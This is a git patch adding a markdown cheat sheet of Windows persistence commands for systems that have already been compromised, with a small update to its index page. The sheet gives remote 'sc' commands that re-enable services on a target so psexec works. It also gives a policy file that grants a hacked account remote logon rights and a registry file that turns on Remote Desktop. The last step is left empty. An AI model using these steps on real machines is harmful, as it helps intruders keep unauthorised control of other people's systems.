From 7ec6e3ae60d3868992a448ccaae721cf92521a86 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 07:03:39 -0500
Subject: [PATCH] Adding new general file and the index file. Chmod'd to not be
 executable

---
 persistence/windows/general.md | 58 ++++++++++++++++++++++++++++++++++
 persistence/windows/index.md   |  3 +-
 2 files changed, 60 insertions(+), 1 deletion(-)
 create mode 100644 persistence/windows/general.md
 mode change 100755 => 100644 persistence/windows/index.md

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
new file mode 100644
index 0000000..2b35690
--- /dev/null
+++ b/persistence/windows/general.md
@@ -0,0 +1,58 @@
+<!-- Code for collapse and expand -->
+<script type="text/javascript"> 
+$(document).ready(function() { 
+$('div.view').hide(); 
+$('div.slide').click(function() {
+$(this).next('div.view').slideToggle('fast'); 
+return false; 
+}); 
+}); 
+</script>
+
+# Windows General Persistence Commands
+
+Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
+
+
+### Enable `psexec`
+ * The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
+
+    `` c:\> net use \\target\ipc$ username /user:password
+    c:\> sc \\target config netdde start= auto
+    c:\> sc \\target config netddedsdm start= auto
+    c:\> sc \\target config clipsrv start= auto
+    c:\> sc \\target start netdde
+    c:\> sc \\target start netddedsdm
+    c:\> sc \\target start clipsrv
+    ``
+
+### Enable Remote Desktop
+ * Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
+
+  1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
+
+     <pre>
+     [Unicode]
+         Unicode=yes
+         [Version]
+         signature="$CHICAGO$"
+         Revision=1
+         [Privilege Rights] [Privilege Rights]
+         seremoteinteractivelogonright = hacked_account
+         seinteractivelogonright = hacked_account
+         sedenyinteractivelogonright =
+         sedenyremoteinteractivelogonright =
+         sedenynetworklogonright =
+     </pre>
+
+  1. Create another file named `enable_ts.reg` containing the contents below. 
+
+     <pre>
+     Windows Registry Editor Version 5.00
+     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+     "fDenyTSConnections"=dword:00000000
+     "TSEnabled"=dword:00000001
+     "TSUserEnabled"=dword:00000000
+     </pre>
+
+  1. 
\ No newline at end of file
diff --git a/persistence/windows/index.md b/persistence/windows/index.md
old mode 100755
new mode 100644
index d31bcf0..9ef9d53
--- a/persistence/windows/index.md
+++ b/persistence/windows/index.md
@@ -4,4 +4,5 @@ Commands that help you maintain control over a compromised system.
 
   * [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot.
   * [Binary Planting](binary.md) - Putting binary files in certain places.
-  * [Covering Tracks](cover.md) - Covering your tracks.
\ No newline at end of file
+  * [Covering Tracks](cover.md) - Covering your tracks.
+  * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.
\ No newline at end of file